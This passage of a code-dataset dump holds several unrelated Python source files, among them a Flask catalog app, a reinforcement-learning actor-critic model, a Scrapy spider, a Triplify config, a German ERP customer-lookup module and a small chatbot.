category.id) & (Item.name == item_name)).first()\n return jsonify(item.serialize)\n\n\n@app.route('/catalog/item/new', methods=['GET', 'POST'])\ndef new_item():\n # check if the user is logged in first\n if 'username' not in login_session:\n return redirect(url_for('login'))\n\n categories = Category.query.all()\n\n # get the form data and create a new item\n if request.method == 'POST':\n i = Item(\n request.form['title'],\n request.form['description'],\n int(request.form['category'])\n )\n db_session.add(i)\n db_session.commit()\n return redirect(url_for('index'))\n\n return render_template('edit.html',\n categories=categories)\n\n\n@app.route('/catalog//edit', methods=['GET', 'POST'])\ndef edit_item(item_name):\n # check if the user is logged in first\n if 'username' not in login_session:\n return redirect(url_for('login'))\n\n categories = Category.query.all()\n item = Item.query.filter_by(name=item_name).first()\n\n # get the form data and update the selected item\n if request.method == 'POST':\n item.title = request.form['title']\n item.description = request.form['description']\n item.category_id = int(request.form['category'])\n db_session.commit()\n\n return redirect(url_for('index'))\n\n return render_template('edit.html',\n categories=categories,\n item=item)\n\n\n@app.route('/catalog//delete')\ndef delete_item(item_name):\n # check if the user is logged in first\n if 'username' not in login_session:\n return redirect(url_for('login'))\n\n # redirects to the confirmation page\n return render_template('delete.html',\n item_name=item_name)\n\n\n@app.route('/catalog//confirm_delete')\ndef confirm_delete_item(item_name):\n # check if the user is logged in first\n if 'username' not in login_session:\n return redirect(url_for('login'))\n\n # delete the item\n item = Item.query.filter_by(name=item_name).first()\n db_session.delete(item)\n db_session.commit()\n return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n init_db()\n app.debug = True\n app.run(host='0.0.0.0', port=5000)\n","sub_path":"vagrant/catalog/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":9729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"23622384","text":"\"\"\" Packaged MASAC\"\"\"\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nfrom torch.distributions import Normal\n\ndef init_layer_uniform(layer: nn.Linear, init_w: float = 3e-3) -> nn.Linear:\n layer.weight.data.uniform_(-init_w, init_w)\n layer.bias.data.uniform_(-init_w, init_w)\n\n return layer\n\nclass Actor(nn.Module):\n def __init__(\n self,\n in_dim: int,\n out_dim: int,\n log_std_min: float= -20,\n log_std_max: float=2,\n hidden_dim1: int=128,\n hidden_dim2: int=128):\n super(Actor, self).__init__()\n\n self.log_std_min = log_std_min\n self.log_std_max = log_std_max\n\n self.hidden1 = nn.Linear(in_dim, hidden_dim1)\n self.hidden2 = nn.Linear(hidden_dim1, hidden_dim2)\n\n log_std_layer = nn.Linear(hidden_dim2, out_dim)\n self.log_std_layer = init_layer_uniform(log_std_layer)\n\n mu_layer = nn.Linear(hidden_dim2, out_dim)\n self.mu_layer = init_layer_uniform(mu_layer)\n\n def forward(self, state: torch.Tensor) -> torch.Tensor:\n x = F.relu(self.hidden1(state))\n x = F.relu(self.hidden2(x))\n\n mu = self.mu_layer(x).tanh()\n\n log_std = self.log_std_layer(x).tanh()\n log_std = self.log_std_min + 0.5 * (\n self.log_std_max - self.log_std_min\n ) * (log_std + 1)\n std = torch.exp(log_std)\n\n dist = Normal(mu, std)\n z = dist.rsample()\n\n action = z.tanh()\n log_prob = dist.log_prob(z) - torch.log(1 - action.pow(2) + 1e-7)\n log_prob = log_prob.sum(-1, keepdim=True)\n\n return action, log_prob\n\n\nclass CriticQ(nn.Module):\n def __init__(\n self,\n in_dim: int,\n hidden_dim1: int=128,\n hidden_dim2: int=128):\n super().__init__()\n\n self.hidden1 = nn.Linear(in_dim, hidden_dim1)\n self.hidden2 = nn.Linear(hidden_dim1, hidden_dim2)\n self.out = nn.Linear(hidden_dim1, 1)\n self.out = init_layer_uniform(self.out)\n\n def forward(\n self, \n state:torch.Tensor, \n action: torch.Tensor) -> torch.Tensor:\n x = torch.cat((state, action), dim=-1)\n x = F.relu(self.hidden1(x))\n x = F.relu(self.hidden2(x))\n value = self.out(x)\n\n return value\n\nclass CriticV(nn.Module):\n def __init__(\n self,\n in_dim: int,\n hidden_dim1: int=128,\n hidden_dim2: int=128):\n super().__init__()\n\n self.hidden1 = nn.Linear(in_dim, hidden_dim1)\n self.hidden2 = nn.Linear(hidden_dim1, hidden_dim2)\n self.out = nn.Linear(hidden_dim2, 1)\n self.out = init_layer_uniform(self.out)\n\n def forward(\n self, \n state: torch.Tensor) -> torch.Tensor:\n x = F.relu(self.hidden1(state))\n x = F.relu(self.hidden2(x))\n value = self.out(x)\n\n return value\n\n\n","sub_path":"models/actor_critic.py","file_name":"actor_critic.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"644014603","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\nclass TiempoMeteoSpider(scrapy.Spider):\n name = 'tiempoMeteo'\n \n def start_requests(self):\n base_url = \"https://www.transfermarkt.es/laliga/startseite/wettbewerb/ES1/saison_id/2018/plus/1\"\n yield scrapy.Request(url=(base_url))\n \n def parse(self, response):\n\n resumen = {\n \n 'tabla': response.xpath('//*[@id=\"yw1_c0\"]').extract_first()\n }\n \n yield resumen","sub_path":"quotesbot-master/quotesbot/spiders/tiempo_meteorolgogico-xpath.py","file_name":"tiempo_meteorolgogico-xpath.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"292631512","text":"\"\"\"\nThis file contains the configuration for triplify.\nTriplify rapidly simplifies the creation of structured content for Web 2.0\nmashups and Semantic Web applications.\nTriplyfy uses a number of SQL queries, whose results are converted into\neither RDF/N3, JSON or Linked Data.\n\n@version $Id:$\n@license LGPL\n@copyright 2008 Remon Georgy (remon.sherin@gmail.com)\n\"\"\"\nimport MySQLdb\n\ntriplify = {}\n\n\"\"\"\nTriplify uses a PDO object to connect to the database.\nThe following line creates an appropriate PDO object for a MySQL database.\nPlease adjust the values for database name, user and password.\nFor maximum security, you can create a database user specificially for\nTriplify, which has solely readable access to the columns of your database\nschema, which should be made public. Alternatively, you can include the\nconfiguration of your Web application and reuse its credentials here.\n\"\"\"\ntriplify['db'] = MySQLdb.connect(host = \"localhost\",user = \"user\",passwd = \"password\",db = \"database\")\n\n\"\"\"\nTriplify uses URIs to identify objects. In order to simplify their handling\nyou should define shortcuts (i.e. namespace prefixes) for all namespaces\nfrom which you want to use URIs.\nA 'vocabulary' entry entry is mandatory - it specifies, which default prefix\nshould be used for vocabulary elements such as classes and properties. Other\nthan the prefix for instances this prefix should be shared between different\ninstallations of a certain Web application on the Web.\n\"\"\"\n\ntriplify['namespaces']= {\n 'vocabulary':'http://byteflow.rgeorgy.com/triplify/vocabulary/',\n 'rdf':'http://www.w3.org/1999/02/22-rdf-syntax-ns#',\n 'rdfs':'http://www.w3.org/2000/01/rdf-schema#',\n 'owl':'http://www.w3.org/2002/07/owl#',\n 'foaf':'http://xmlns.com/foaf/0.1/',\n 'sioc':'http://rdfs.org/sioc/ns#',\n 'sioctypes':'http://rdfs.org/sioc/types#',\n 'dc':'http://purl.org/dc/elements/1.1/',\n 'dcterms':'http://purl.org/dc/terms/',\n 'skos':'http://www.w3.org/2004/02/skos/core#',\n 'tag':'http://www.holygoat.co.uk/owl/redwood/0.1/tags/',\n 'xsd':'http://www.w3.org/2001/XMLSchema#',\n 'update':'http://triplify.org/vocabulary/update#'}\n\n\"\"\"\nThe core of triplify are SQL queries, which select the information to be made\navailable.\nYou can provide a number of arbitrary queries. Each query, however, should\nselect information about an object of a certain type. This type, which serves\nas an index in the associative queries configuration array, is also used to\nconstruct corresponding URIs for the objects returned by the query.\nThe first column returned by the query represents the ID of the object and\nhas to be named \"id\", all other columns represent characteristics (or\nproperties of this object). As column identifier you should reuse existing\nvocabularies whenever possible. If your \"user\" table, for example, contains a\ncolumn named \"first_name\" this can be easily mapped to the corresponding FOAF\nproperty using: \"SELECT id,first_name AS 'foaf:firstName' FROM user\".\nYou can use the following column naming convention in order to inform\nTriplify about the datatype or language of a column:\nSELECT id,price AS 'price^^xsd:decimal',desc AS 'rdf:label@en' FROM products\nHowever, Triplify tries to autodetect and convert timestamps appropriately.\nSimilarly, you can indicate that a column represents an objectProperty\npointing to other objects (foreign key):\nSELECT id,user_id 'sioc:has_creator->user'\nOonly select information, which does not contain sensitive information and\ncan be made public. For example, email adresses and password (hashes) should\nnever be exposed. However, you can use the database function SHA to\nmask email addresses, e.g.:\nSELECT SHA(CONCAT('mailto:',email)) AS 'foaf:mbox_sha1sum' FROM users\nThe following queries are example queries and have to be replaced by queries\nsuitable for your database schema.\n\"\"\"\n\ntriplify['queries'] = {\n 'post':[\n \"\"\"SELECT \n p.id AS id,\n p.name AS 'dc:title',\n p.text AS 'sioc:content',\n u.username AS 'sioc:has_creator',\n p.upd_date AS 'dcterms:modified',\n p.date AS 'dcterms:created'\n FROM blog_post p INNER JOIN auth_user u ON(p.author_id=u.id)\"\"\"],\n 'user':[\n \"\"\"SELECT \n id,\n username AS 'foaf:name',\n SHA(CONCAT('mailto:',email)) AS 'foaf:mbox_sha1sum'\n FROM auth_user\"\"\"],\n 'update':[\n \"\"\"SELECT \n p.upd_date AS id,\n p.id AS 'update:updatedResource->post' \n FROM blog_post p\"\"\"]}\n \n\"\"\"\nSome of the columns of the Triplify queries will contain references to other\nobjects rather than literal values. The following configuration array\nspecifies, which columns are references to objects of which type.\n\"\"\"\n\ntriplify['objectProperties']={\n 'sioc:has_creator':'user',}\n\n\"\"\"\nObjects are classified according to their type. However, you can specify\na mapping here, if objects of a certain type should be associated with a\ndifferent class (e.g. classify all users as 'foaf:person'). If you are\nunsure it is safe to leave this configuration array empty.\n\"\"\"\n\ntriplify['classMap']={\n 'user':'foaf:person'}\n\n\"\"\"\nYou can attach license information to your content.\nA popular license is Creative Commons Attribution, which allows sharing and\nremixing under the condition of attributing the original author.\n\"\"\"\ntriplify['license']='http://creativecommons.org/licenses/by/3.0/us/'\n\n\"\"\"\nAdditional metadata\nYou can add arbitrary metadata. The keys of the following array are\nproperties, the values will be represented as respective property values.\n\"\"\"\n\ntriplify['metadata']={\n 'dc:title':'',\n 'dc:publisher':''}\n\n\"\"\"\nSet this to true in order to register your linked data endpoint with the\nTriplify registry (http://triplify.org/Registry).\nRegistering is absolutely recommended, since that allows other Web sites\n(e.g. peer Web applications, search engines and mashups) to easily find your\ncontent. Requires PHP ini variable allow_url_fopen set to true.\nYou can also register your data source manually by accessing register.php in\nthe triplify folder, or at: http://triplify.org/Registry\n\"\"\"\n\ntriplify['register']=True\n\n\"\"\"\nYou can specify for how long generated files should be cached. For smaller\nWeb applications it is save to disable caching by setting this value to zero.\n\"\"\"\n\n#triplify['TTL']=100\n\"\"\"\nDirectory to be used for caching\n\"\"\"\ntriplify['cachedir']='cache/'\n\n\"\"\"\nLinked Data Depth\nSpecify on which URI level to expose the data - possible values are:\n - Use 0 or ommit to expose all available content on the highest level\n all content will be exposed when /triplify/ is accessed on your server\n - Use 1 to publish only links to the classes on the highest level and all\n content will be exposed when for example /triplify/user/ is accessed.\n - Use 2 to publish only links on highest and classes level and all\n content will be exposed on the instance level, e.g. when /triplify/user/1/\n is accessed.\n\"\"\"\n\ntriplify['LinkedDataDepth']='2'\n\n\"\"\"\nCallback Functions\nSome of the columns of the Triplify queries will contain data, which has to\nbe processed before exposed as RDF (literals). This configuration array maps\ncolumn names to respective functions, which have to take the data value as a\nparameter and return it processed.\n\"\"\"\n\ntriplify['CallbackFunctions']={}","sub_path":"triplify-python/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"424334354","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom ..pattern.carve import arg, carve\nfrom ..compression.decompress import decompress\n\n\nclass carveb64z(carve):\n \"\"\"\n Carves base64 encoded expressions, decodes them, and then applies the `refinery.decompress`\n unit to the result. By default, only the longest base64 string is processed.\n \"\"\"\n def __init__(\n self, single: arg.switch('-m', '--multi', help='Process all base64 strings instead of just the longest.') = True,\n min=1, max=None, stripspace=False, unique=False, longest=False, take=None, utf16=True, ascii=True\n ):\n self.superinit(super(), format='b64', decode=True, **vars())\n self.decompressor = decompress()\n\n def process(self, data):\n for chunk in super().process(data):\n yield self.decompressor(chunk)\n","sub_path":"refinery/units/shortcuts/carveb64z.py","file_name":"carveb64z.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"56492659","text":"import re\nimport random\nimport makeMarkov\nimport analyzer\nfrom itertools import chain # itertoolsモジュールからchainをインポート\n\nclass ChatBot(object):\n \"\"\"ChatBotクラス \n 応答に使用する文章の生成と、実際に応答するためのメッセージを返す処理を行う。\n \n Attributes:\n sentences(strのlist): マルコフ連鎖を利用して生成した文章のリスト。\n \n \"\"\"\n def __init__(self):\n \"\"\"\n MakeMarkovオブジェクトを生成し、文書言うの生成と前処理を行う。\n \n \"\"\"\n # MakeMarkovオブジェクトを生成\n markov = makeMarkov.MakeMarkov()\n # マルコフ連鎖で生成された文章群を取得\n text = markov.make()\n # 各文章の末尾の改行で分割してリストに格納\n self.sentences = text.split('。')\n # リストから空の要素を取り除く\n if '' in self.sentences:\n self.sentences.remove('')\n \n def dialogue(self, input):\n \"\"\"\n マルコフ連鎖によって生成された文章群から\n ユーザーの発言に含まれる名詞を含むものを抽出して応答メッセージとして返す。\n\n Parameters:\n input(str) :ユーザーによって入力された文字列。 \n Returns:\n str: 応答メッセージ。\n \"\"\"\n # インプット文字列を形態素解析\n parts = analyzer.analyze(input)\n\n m = [] #\n # 解析結果の形態素と品詞に対して反復処理\n for word, part in parts: \n # インプット文字列に名詞があればそれを含むマルコフ連鎖文を検索\n if analyzer.keyword_check(part):\n #print('afetr_check_word===',word)\n # マルコフ連鎖で生成した文章を1つずつ処理\n for element in self.sentences:\n # 形態素の文字��がマルコフ連鎖の文章に含まれているか検索する\n # 最後を'.*?'にすると「花」のように検索文字列だけにもマッチ\n #\n # + '.*'として検索文字列だけにマッチしないようにする\n #\n find = '.*?' + word + '.*'\n # マルコフ連鎖文にマッチさせる\n tmp = re.findall(find, element)\n if tmp:\n # マッチする文章があればリストmに追加\n m.append(tmp)\n # findall()はリストを返してくるので多重リストをフラットにする\n m = list(chain.from_iterable(m))\n \n if m:\n # インプット文字列の名詞にマッチしたマルコフ連鎖文からランダムに選択\n return random.choice(m)\n else:\n # マッチするマルコフ連鎖文がない場合\n return random.choice(self.sentences)\n","sub_path":"chap10/sec02/chatBot.py","file_name":"chatBot.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"598897966","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nkunden.py - High Level Access Kundeninformationen. Teil von huSoftM.\n\nCreated by Maximillian Dornseif on 2007-04-13.\nCopyright (c) 2007 HUDORA GmbH. All rights reserved.\n\"\"\"\n\nimport datetime\nimport husoftm.connection2\nimport cs.caching as caching\nimport husoftm.tools\nimport warnings\n\n\nclass Kunde(object):\n \"\"\"Representation of SoftM \"Kunden\" data objects.\"\"\"\n\n def __init__(self, kundennr='', name1='', name2='', name3='', name4='',\n strasse='', plz='', ort='', land=''):\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n self.kundennr = kundennr\n self.name1 = name1\n self.name2 = name2\n self.name3 = name3\n self.name4 = name4\n self.strasse = strasse\n self.plz = plz\n self.ort = ort\n self.land = land\n self.sortierfeld = self.fax = self.tel = self.aenderung = self.iln = self.erfassung = None\n self.sachbearbeiter = self.mail = self.mobil = self.unsere_lieferantennr = self.adressdatei_id = None\n\n def __repr__(self):\n return str(vars(self)) # crude ...\n\n def fill_from_softm(self, row):\n \"\"\"Initializes the object from data returned by SoftM.\"\"\"\n self.kundennr = row.get('kundennr', '') # 10003\n self.sortierfeld = row.get('sortierfeld', '') # AUER* NEUB\n self.name1 = row.get('name1', '') # Sport ...\n self.name2 = row.get('name2', '')\n self.name3 = row.get('name3', '')\n #self.name4 = row.get('name4', '')\n self.strasse = row.get('strasse', '')\n self.plz = row.get('plz', '')\n self.ort = row.get('ort', '')\n self.tel = row.get('tel', '')\n self.fax = row.get('fax', '')\n #self.url = row.get('url', '')\n self.mobil = row.get('mobil', '')\n self.mail = row.get('mail', '')\n #self.kundengruppe = row.get('kundengruppe_id', '')\n #self.postfach = row.get('postfach', '')\n #self.postfach_plz = row.get('postfach_plz', '')\n #self.created_at = row.get('erfassung_date', '') # 2004-12-01\n #self.updated_at = row.get('aendertung_date', '') # 2007-04-11\n #self.mitgliedsnr = row.get('mitgliedsnr', '')\n #self.ustid = row.get('ustid', '') # '132838685'\n self.adressdatei_id = row.get('adressdatei_id', '') # 123656179\n #self.company = row.get('company', '') # '06'\n #self.verband = row.get('verband', '')\n #self.gebiet = row.get('gebiet', '') # ': u'04'\n #self.distrikt = row.get('distrikt', '') # ': u'16'\n #self.vertreter = row.get('vertreter', '') # ': u'201'\n #self.branche = row.get('branche', '') # ': u'13'\n #self.versandart = row.get('versandart', '') # ': u''\n if 'iln' in row:\n self.iln = unicode(int(row['iln'])).strip()\n self.land = husoftm.tools.land2iso(row['laenderkennzeichen']) # D\n if row['erfassung_date']:\n self.erfassung = row['erfassung_date']\n if row['aenderung_date']:\n self.aenderung = row['aenderung_date']\n else:\n self.aenderung = self.erfassung\n self.sachbearbeiter = row.get('sachbearbeiter', '') # ': u'Birgit Bonrath'\n #self.verpackungsvorschrift = row.get('verpackungsvorschrift', '') # ': u'',\n #self.lieferbedingung = row.get('lieferbedingung', '') # ': u''\n #self.auslieferunglager = row.get('auslieferunglager', 0) # ': 0\n #self.interne_firmennr = row.get('interne_firmennr', '') # ': u''\n self.unsere_lieferantennr = row.get('unsere_lieferantennumemr', '')\n self.verband = row.get('verband', '')\n self.mitgliedsnr = row.get('mitgliedsnr', '')\n self.ustid = row.get('ustid', '')\n self.kundengruppe = row.get('kundengruppe', '')\n self.vertreter = row.get('vertreter', '')\n self.gebiet = row.get('gebiet', '')\n self.branche = row.get('branche', '')\n self.distrikt = row.get('distrikt', '')\n # 'skontoschluessel': 16,\n # 'mahnsperre': u'',\n # 'delcredereschl\\xc3\\xbcssel': 0,\n # 'bonnitaet': u'',\n # 'liefersperre': 0,\n # 'kreditlimit2': 0,\n # 'lastschrift': u'',\n # 'offener_aftragswert': 2.7000000000000002,\n # 'kreditlimit': 2.7000000000000002,\n # 'inland_ausland': 0,\n # self.satzstatus = row.get('satzstatus', '')\n self.satzstatus = husoftm.connection2.get_connection().query('XKD00', fields=['KDSTAT'], condition=\"KDKDNR = %s\" % husoftm.tools.sql_quote(row.get('kundennr')))\n return self\n\n\ndef get_kundennummern():\n \"\"\"Returns a list of all 'Kundennummern'.\"\"\"\n\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n rows = husoftm.connection2.get_connection().query('XKD00', fields=['KDKDNR'])\n return [int(x[0]) for x in rows]\n\n\ndef get_changed_after(date):\n \"\"\"Returns a list of all Kundennummern where the underlaying Data has changed since .\"\"\"\n\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n date = int(date.strftime('1%y%m%d'))\n rows = husoftm.connection2.get_connection().query('XKD00', fields=['KDKDNR'],\n condition=\"KDDTER>%d OR KDDTAE>=%d\" % (date, date))\n ret = set([int(x[0]) for x in rows])\n #\n rows = husoftm.connection2.get_connection().query('AKZ00', fields=['KZKDNR'],\n condition=\"KZDTAE>=%d\" % (date))\n ret = ret | set([int(x[0]) for x in rows])\n return list(ret)\n\n\n#@caching.cache_function(60*60*2)\ndef get_kunde(kdnnr):\n \"\"\"Get the Kunde object representing Kundennummer .\n\n must be an Integer in the Range 10000..99999.\n If no data exists for that KdnNr ValueError is raised.\"\"\"\n\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n rows = husoftm.connection2.get_connection().query(['XKD00', 'XKS00', 'AKZ00'],\n condition=\"KDKDNR='%8d' AND KSKDNR='%8d' AND KZKDNR LIKE '%s'\" % (int(kdnnr), int(kdnnr),\n '%' + str(kdnnr)))\n if not rows:\n # no AKZ00 entry\n rows = husoftm.connection2.get_connection().query(['XKD00', 'XKS00'],\n condition=\"KDKDNR='%8d' AND KSKDNR='%8d'\" % (int(kdnnr), int(kdnnr)))\n if not rows:\n # no XKS00 entry\n rows = husoftm.connection2.get_connection().query(['XKD00', 'AKZ00'],\n condition=\"KDKDNR='%8d' AND KZKDNR='%8d'\" % (int(kdnnr), int(kdnnr)))\n if not rows:\n # no AKZ and XKS00 entry\n rows = husoftm.connection2.get_connection().query(['XKD00'],\n condition=\"KDKDNR='%8d'\" % (int(kdnnr)))\n if len(rows) > 1:\n raise RuntimeError(\"Mehr als einen Kunden gefunden: %r\" % kdnnr)\n\n if not rows:\n raise ValueError(\"Keine Daten für Kundennummer %r gefunden\" % kdnnr)\n\n return Kunde().fill_from_softm(rows[0])\n\n\n@caching.cache_function(60 * 60 * 2)\ndef get_kunde_by_iln(iln):\n \"\"\"Get Kunden Address based on ILN.\n\n See http://cybernetics.hudora.biz/projects/wiki/AddressProtocol for the structure of returned data.\n\n must be an valit GLN/ILN encoded as an String.\n If no data exists for that GLN/ILN ValueError is raised.\n \"\"\"\n\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n rows = husoftm.connection2.get_connection().query(['XKS00'], condition=\"KCE2IL='%s'\" % (int(iln), ))\n if rows:\n # stammadresse\n return get_kunde(rows[0]['kundennr'])\n else:\n # abweichende Lieferadresse\n rows = husoftm.connection2.get_connection().query(['AVA00'], condition=\"VAILN='%s'\" % (int(iln), ))\n if rows:\n rows2 = husoftm.connection2.get_connection().query(['XXA00'],\n condition=\"XASANR='%s'\" % (int(rows[0]['satznr']), ))\n if rows2:\n kunde = Kunde().fill_from_softm(rows2[0])\n kunde.kundennr = kunde.kundennr + ('.%03d' % int(rows[0]['versandadressnr']))\n return kunde\n raise ValueError(\"Keine Daten für GLN/ILN %r gefunden\" % iln)\n\n\ndef get_lieferadressen(kdnr):\n \"\"\"Sucht zusätzliche Lieferadressen für eine Kundennr raus.\n\n Gibt eine Liste aller möglichen Lieferadressen in Form von Kunden-Objekten zurück.\n >>>get_lieferadressen(13041)\n [{'sortierfeld': '', 'tel': '+49 2041 690000', 'erfassung': datetime.date(2004, 12, 16),\n 'strasse': 'An der Knippenburg 4', 'kundennr': '13041.001', 'mobil': '', 'gebiet': '',\n 'aenderung': datetime.date(2004, 12, 16), 'mail': '', 'adressdatei_id': '', 'ustid': '',\n 'distrikt': '', 'fax': '', 'ort': 'Bottrop', 'plz': '46238', 'vertreter': '', 'sachbearbeiter': '',\n 'name4': '', 'name2': 'Schuhe GmbH & Co. KG', 'name3': 'Distributionszentrum West',\n 'name1': 'Heinrich Deichmann', 'kundengruppe': '', 'land': 'DE', 'verband': '', 'iln': u'',\n 'unsere_lieferantennr': '', 'mitgliedsnr': '', 'branche': ''},\n {'sortierfeld': '', 'tel': '+ 49 9852 9060', 'erfassung': datetime.date(2004, 12, 16), 'strasse': 'Deichmann-Str. 1',\n 'kundennr': '13041.002', 'mobil': '', 'gebiet': '', 'aenderung': datetime.date(2004, 12, 16), 'mail': '',\n 'adressdatei_id': '', 'ustid': '', 'distrikt': '', 'fax': '', 'ort': 'Feuchtwangen', 'plz': '91555', 'vertreter': '',\n 'sachbearbeiter': '', 'name4': '', 'name2': 'Schuhe GmbH & Co. KG', 'name3': u'Distributionszentrum S\\xfcd',\n 'name1': 'Heinrich Deichmann', 'kundengruppe': '', 'land': 'DE', 'verband': '', 'iln': u'',\n 'unsere_lieferantennr': '', 'mitgliedsnr': '', 'branche': ''},\n ...]\n \"\"\"\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n avrows = husoftm.connection2.get_connection().query(['AVA00'], condition=\"VAKDNR='%8s' AND VASTAT <>'X'\" % int(kdnr))\n kunden = []\n for row in avrows:\n xarows = husoftm.connection2.get_connection().query(['XXA00'], condition=\"XASANR='%s'\" %\n int(row['satznr']))\n if xarows:\n assert(len(xarows) == 1)\n kunde = Kunde().fill_from_softm(xarows[0])\n kunde.kundennr = kunde.kundennr + ('.%03d' % int(row['versandadressnr']))\n kunden.append(kunde)\n return kunden\n\n\ndef get_lieferadressen_all():\n \"\"\"Gibt ein dict mit allen vorhandenen zusätzlichen Lieferadressen zurück.\n\n Key dieses dicts ist die erweiterte Kundennummer (zB. '17200.001' == kundennr.versandadressnr).\n Value ist ein dict entsprechend dem AdressProtocol.\n\n \"\"\"\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n rows = husoftm.connection2.get_connection().query(['AVA00', 'XXA00'], condition=\"XAKZRS = 7 AND XASANR=VASANR\")\n return dict((\"%s.%03d\" % (row['kundennr'], int(row['versandadressnr'])), row) for row in rows)\n\n\n@caching.cache_function(60 * 60 * 2)\ndef get_kundenbetreuer(kundennr):\n \"\"\"'Liefert einen String, der den Betreuer im Hause für einen bestimmten Kunden identifizert oder ''.\"\"\"\n rows = husoftm.connection2.get_connection().query(['AKZ00'], fields=['KZINFO'],\n condition=\"KZKDNR LIKE '%s'\" % ('%' + str(kundennr)))\n if rows:\n return rows[0][0]\n return ''\n\n\ndef offene_posten(kundennr):\n \"\"\"Offene Posten für diesen Kunden ermitteln.\"\"\"\n rows = husoftm.connection2.get_connection().query('BOP00', fields=[\"OPRGSH\", \"SUM(OPOPBT)\"],\n condition=\"OPPKTO='%8s'\" % int(kundennr),\n grouping='OPRGSH')\n offene_posten = dict(rows)\n summe = float(offene_posten.get('S', 0)) - float(offene_posten.get('H', 0))\n return summe\n\n\ndef kredit_limit(kundennr):\n \"\"\"Höhe des Kreditlimits für diesen Kunden zurückgeben.\"\"\"\n rows = husoftm.connection2.get_connection().query('XKS00', condition=\"KSKDNR='%8s'\" % int(kundennr))\n return rows[0]['kreditlimit2']\n\n\ndef _selftest():\n \"\"\"Test basic functionality\"\"\"\n get_kundenbetreuer('17200')\n get_kunde_by_iln('4306544031019')\n get_kunde_by_iln('4306544000008')\n get_changed_after(datetime.date(2007, 1, 1))\n get_kundennummern()\n #for kdnnr in nummern:\n # get_kunde(kdnnr=kdnnr) # ['aendertung_date']\n\nif __name__ == '__main__':\n _selftest()\n","sub_path":"husoftm/kunden.py","file_name":"kunden.py","file_ext":"py","file_size_in_byte":12734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"381298857","text":"from sklearn import svm\nfrom sklearn import datasets\n\nclf = svm.SVC(gamma='scale')\niris = datasets.load_iris()\nX, y = iris.data, iris.target\ninfo = clf.fit(X, y)\nprint(info)\n\nimport pickle\ns = pickle.dumps(clf)\nclf2=pickle.loads(s)\ninfo = clf2.predict(X[0:1])\nprint(info)\nprint(y[0])\n","sub_path":"sklearn_test/pick_test.py","file_name":"pick_test.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"370719288","text":"from django.core.urlresolvers import reverse\n\nfrom core import views\nfrom casestudy import casestudies\n\n\ndef test_landing_page(client):\n url = reverse('landing-page')\n\n response = client.get(url)\n\n assert response.status_code == 200\n assert response.template_name == [views.LandingPagelView.template_name]\n assert response.context_data['casestudies'] == [\n casestudies.MARKETPLACE,\n casestudies.HELLO_BABY,\n casestudies.YORK,\n ]\n","sub_path":"core/tests/test_core_views.py","file_name":"test_core_views.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"386748180","text":"# -*- encoding:utf8 -*-\n\nfrom ConnectDB import ConnectDB\nimport threading\nfrom Config import Config\n\nclass DALPool(object):\n thr=threading.Lock()\n # 创建连接池\n pool = []\n db_no = \"0\"\n\n @staticmethod\n def init(db_no=\"0\"):\n DALPool.db_no = db_no\n for i in xrange(0,Config.CONNNUM):\n DALPool.pool.append(ConnectDB.get_pool_conn(db_no))\n\n # 获取连接\n @staticmethod\n def get_conn(db_no=\"0\"):\n ConnectDB.thr.acquire()\n if len(DALPool.pool)==0:\n for i in xrange(0,3):\n DALPool.pool.append(ConnectDB.get_pool_conn(db_no))\n ConnectDB.thr.release()\n return DALPool.pool.pop(0)\n\n # 还回连接\n @staticmethod\n def ret_conn(conn):\n ConnectDB.thr.acquire()\n DALPool.pool.append(conn)\n ConnectDB.thr.release()\n\n @staticmethod\n def get_encoding(db_no=\"0\"):\n return ConnectDB.get_encoding(db_no)\n\n # 清空连接\n @staticmethod\n def clear_conn():\n ConnectDB.thr.acquire()\n for conn in DALPool.pool:\n conn.close()\n ConnectDB.thr.release()\n DALPool.pool = []\n\n\n def __del__(self):\n DALPool.clear_conn()","sub_path":"股票流水记账合并/MergeExcel/DALPool.py","file_name":"DALPool.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"586879425","text":"#encoding=utf-8\r\n'''\r\n装饰器\r\n''' \r\n\r\nimport time\r\nfrom functools import wraps\r\n \r\n # 定义一个计时器,传入一个,并返回另一个附加了计时功能的方法 \r\ndef timeit(func): \r\n # 